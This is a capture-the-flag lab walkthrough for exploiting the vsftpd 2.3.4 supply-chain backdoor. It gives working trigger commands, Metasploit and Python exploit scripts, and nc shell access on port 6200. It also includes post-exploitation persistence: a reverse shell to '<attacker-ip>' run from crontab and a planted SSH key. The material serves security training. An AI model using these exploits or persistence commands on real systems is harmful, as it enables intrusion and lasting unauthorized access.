Anonymous 2

🔓 Can you exploit the hidden backdoor in this FTP server?

Easy 03 Dec 2025 Free Access Solution Available

A seemingly innocent FTP server harbors a dark secret - a malicious backdoor inserted by attackers who compromised the official distribution. The vulnerability lies dormant, waiting for the right trigger to unleash remote access. 🎯 Time to discover how compromised software can become your gateway to system control!

Flags

Points

57%

Success Rate

Start Your Challenge

Launch your dedicated machine to begin hacking

~1-2 min setup

Dedicated server

Private instance

Industry standard

This solution is for Flags Mode

This walkthrough explains how to hack the lab and capture the flags. For help with Learning Mode questions, use the Request Hint button next to each question.

Easy

🔓 Anonymous FTP 2 - Complete Backdoor Exploitation Solution

Objective: Exploit the vsftpd 2.3.4 backdoor vulnerability to gain remote shell access and retrieve the flag from the target system.

🔍 Step 1: Service Discovery and Enumeration

Begin by scanning the target to identify running services:

# Nmap service scan
nmap -Pn -sV -p21,6200 <target-ip>

# Expected output:
# 21/tcp open  ftp     vsftpd 2.3.4
# 6200/tcp filtered unknown

The scan reveals vsftpd 2.3.4 running on port 21. Port 6200 may appear filtered initially but becomes important later.

🔍 Step 2: Understanding the vsftpd 2.3.4 Backdoor

The vsftpd 2.3.4 backdoor was inserted by attackers who compromised the official distribution in July 2011. The backdoor is triggered when a username containing the string ":)" is used during FTP authentication.

Backdoor Mechanism:
• When username contains ":)", the backdoor activates
• Opens a shell listener on port 6200
• Provides direct system access without authentication
• The backdoor code is in sysdeputil.c (vsf_sysutil_extra function)

🔍 Step 3: Triggering the Backdoor

Connect to the FTP service and trigger the backdoor using a malicious username:

Using FTP Client

# Connect to FTP service
ftp <target-ip>

# When prompted for username:
Username: user:)
Password: anything

# The login will fail, but backdoor activates

Using Telnet

# Connect via telnet
telnet <target-ip> 21

# Send FTP commands:
USER user:)
PASS anything

# Connection may close, but backdoor is active

🔍 Step 4: Connecting to the Backdoor Shell

After triggering the backdoor, connect to the shell listener on port 6200:

Backdoor Shell Access:
telnet <target-ip> 6200

or

nc <target-ip> 6200

You should now have a shell prompt with system access.

🔍 Step 5: System Exploration and Flag Retrieval

Once connected to the backdoor shell, explore the system to locate the flag:

# Check current directory
pwd

# List files in current directory
ls -la

# Look for flag in common locations
find / -name "flag*" 2>/dev/null
find / -name "*.txt" 2>/dev/null | grep -i flag

# Check root directory
ls -la /root/

# Read the flag
cat /root/flag.txt

🔍 Step 6: Alternative Exploitation Methods

Using Metasploit

# Start Metasploit
msfconsole

# Use the exploit module
use exploit/unix/ftp/vsftpd_234_backdoor

# Set target
set RHOSTS <target-ip>

# Run exploit
exploit

# Get shell session
sessions -i 1

Python Script

# Create exploit script
import socket

# Trigger backdoor
s = socket.socket()
s.connect(('<target-ip>', 21))
s.send(b'USER user:)\r\n')
s.send(b'PASS pass\r\n')
s.close()

# Connect to shell
s2 = socket.socket()
s2.connect(('<target-ip>', 6200))

Manual Verification

# Check if backdoor is active
nmap -Pn -p6200 <target-ip>

# Should show port 6200 as open
# after triggering the backdoor

# Connect immediately
nc <target-ip> 6200

🔍 Step 7: Understanding the Vulnerability Code

The backdoor code in sysdeputil.c shows how the vulnerability works:

# Trigger detection in str.c:
if((p_str->p_buf[i]==0x3a) && (p_str->p_buf[i+1]==0x29))
{
  vsf_sysutil_extra();  // Calls backdoor function
}

# Backdoor function in sysdeputil.c:
int vsf_sysutil_extra(void)
{
  int fd, rfd;
  struct sockaddr_in sa;
  // Creates socket on port 6200
  sa.sin_port = htons(6200);
  // Binds and listens
  // Accepts connections and spawns shell
  execl("/bin/sh","sh",(char *)0);
}

🔍 Step 8: Exploitation Timeline

Connect to FTP: Establish connection to port 21
Send Malicious Username: Use username containing ":)"
Backdoor Activation: Server processes trigger and opens port 6200
Shell Access: Connect to port 6200 for direct shell access
Flag Retrieval: Navigate filesystem and locate flag file

🔍 Step 9: Common Troubleshooting

Issue	Cause	Solution
Port 6200 not opening	Backdoor not triggered	Ensure username contains ":)" exactly
Connection refused on 6200	Timing issue	Wait a few seconds after FTP login attempt
Shell not responsive	Connection timeout	Try multiple connection attempts
FTP login succeeds	Wrong vsftpd version	Verify target is running vsftpd 2.3.4

🔍 Step 10: Advanced Techniques

Automated Exploitation

# Bash one-liner
(echo 'USER user:)'; echo 'PASS pass'; sleep 2) | nc <target-ip> 21 && nc <target-ip> 6200

# Python automation
#!/usr/bin/env python3
import socket, time
s = socket.socket()
s.connect(('<target-ip>', 21))
s.send(b'USER user:)\r\n')
s.send(b'PASS pass\r\n')
s.close()
time.sleep(2)
s2 = socket.socket()
s2.connect(('<target-ip>', 6200))

Persistence Techniques

# Once in shell, establish persistence
echo 'nc -e /bin/sh <attacker-ip> 4444' > /tmp/backdoor.sh
chmod +x /tmp/backdoor.sh

# Add to crontab
echo '* * * * * /tmp/backdoor.sh' | crontab -

# Or create SSH key
mkdir -p ~/.ssh
echo 'ssh-rsa AAAA...' > ~/.ssh/authorized_keys

🔍 Step 11: Flag Location and Extraction

The flag is typically located in the root directory:

Flag Extraction Commands:

# Navigate to root directory
cd /root

# List files
ls -la

# Read flag file
cat flag.txt

# Alternative search
find / -name "flag.txt" 2>/dev/null
cat $(find / -name "flag.txt" 2>/dev/null)

🔍 Step 12: Security Implications

This vulnerability demonstrates several critical security concepts:

Supply Chain Attacks: Compromised software distributions
Backdoor Persistence: Hidden access mechanisms in legitimate software
Network Service Exploitation: Leveraging service vulnerabilities for system access
Post-Exploitation: System exploration and data exfiltration
Detection Evasion: Backdoors designed to appear as normal functionality

🔍 Step 13: Remediation and Prevention

To prevent similar vulnerabilities:

Software Verification: Verify checksums and digital signatures
Source Code Auditing: Regular security code reviews
Network Monitoring: Monitor for unusual network connections
Patch Management: Keep software updated from trusted sources
Intrusion Detection: Deploy IDS/IPS to detect exploitation attempts
Least Privilege: Run services with minimal required privileges

Historical Context: The vsftpd 2.3.4 backdoor was discovered in July 2011 and represents one of the most well-known examples of a compromised software distribution. The backdoor was inserted by attackers who gained access to the official download site.

Flag Retrieval: After successfully exploiting the backdoor and gaining shell access, the flag can be found in /root/flag.txt and should be submitted to complete the challenge.

Real-World Application: This challenge demonstrates realistic exploitation techniques used in penetration testing and red team exercises. The vsftpd backdoor remains a common target in CTF competitions and security training scenarios.